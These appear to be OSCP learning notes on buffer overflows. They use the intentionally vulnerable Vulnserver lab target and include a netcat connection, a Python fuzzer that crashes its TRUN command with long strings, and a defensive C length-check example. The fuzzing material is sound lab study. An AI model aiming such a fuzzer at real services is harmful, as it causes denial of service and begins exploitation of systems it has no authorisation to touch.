OSCP Learning Notes - Buffer Overflows(1)
2024-10-09 10:24:44
Introduction to Buffer Overflows
Anatomy of Memory
Anatomy of the Stack
Fuzzing
Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver
Immunity Debugger - https://www.immunityinc.com/products/debugger/
Vulnserver Test
1. Open the vulnserver program on Windows.
2. Connect to the vulnserver from Kali Linux.
nc -nv 10.0.0.XX 9999
3. Write the Python fuzzer test script on Kali Linux.
#!/usr/bin/python3
import socket

# Build the test strings: 1 byte, then 100, 300, ... 5900 bytes of "A".
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

# Send each string to the TRUN command over a fresh connection.
for string in buffer:
    print("Fuzzing vulnserver with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.XX', 9999))
    s.send(('TRUN /.:/' + string).encode())
    s.close()
Make the script executable and run fuzzer.py.
chmod +x fuzzer.py
./fuzzer.py
The vulnserver crashed with 5900 bytes.
Immunity Debugger
GUI Screenshot
Open or attach the vulnserver program.
Run fuzzer.py on Kali Linux.
./fuzzer.py
The vulnserver finally crashed.
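The defensive counterpart to this crash is a length check before the command argument is copied into a fixed-size buffer. The following is an added example, not part of the original notes and not vulnserver's source: handle_trun, replay_fuzzer_schedule and the 1024-byte ARG_MAX_LEN limit are hypothetical, and the test input is the same length schedule the fuzzer above sends.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ARG_MAX_LEN 1024   /* assumed limit, not vulnserver's real buffer size */
#define CMD_PREFIX  "TRUN "

/* Returns 0 and fills out on success, -1 for a wrong command, -2 if oversized. */
int handle_trun(const char *msg, size_t msg_len, char *out, size_t out_size)
{
    size_t prefix_len = strlen(CMD_PREFIX);
    if (msg_len < prefix_len || memcmp(msg, CMD_PREFIX, prefix_len) != 0)
        return -1;
    size_t arg_len = msg_len - prefix_len;
    if (arg_len >= out_size)            /* reject before copying; keep room for NUL */
        return -2;
    memcpy(out, msg + prefix_len, arg_len);
    out[arg_len] = '\0';
    return 0;
}

/* Replays the fuzzer's lengths (1, 100, 300, ... 5900); returns the reject count. */
int replay_fuzzer_schedule(int *first_rejected_len)
{
    const char *head = "TRUN /.:/";     /* same command prefix the fuzzer sends */
    size_t head_len = strlen(head);
    char out[ARG_MAX_LEN];
    int rejected = 0;
    *first_rejected_len = -1;
    for (int i = 0; i <= 30; i++) {
        size_t n = (i == 0) ? 1 : (size_t)(100 + 200 * (i - 1));
        char *msg = malloc(head_len + n);   /* constructed sample message */
        if (!msg) return -1;
        memcpy(msg, head, head_len);
        memset(msg + head_len, 'A', n);
        if (handle_trun(msg, head_len + n, out, sizeof out) == -2) {
            if (*first_rejected_len < 0) *first_rejected_len = (int)n;
            rejected++;
        }
        free(msg);
    }
    return rejected;
}

int main(void)
{
    int first, rejected = replay_fuzzer_schedule(&first);
    printf("rejected %d of 31 messages, first at %d bytes\n", rejected, first);
    return 0;
}
```

With the check in place, every oversized message is refused with an error code instead of being copied, so the service keeps running through the whole fuzzing run.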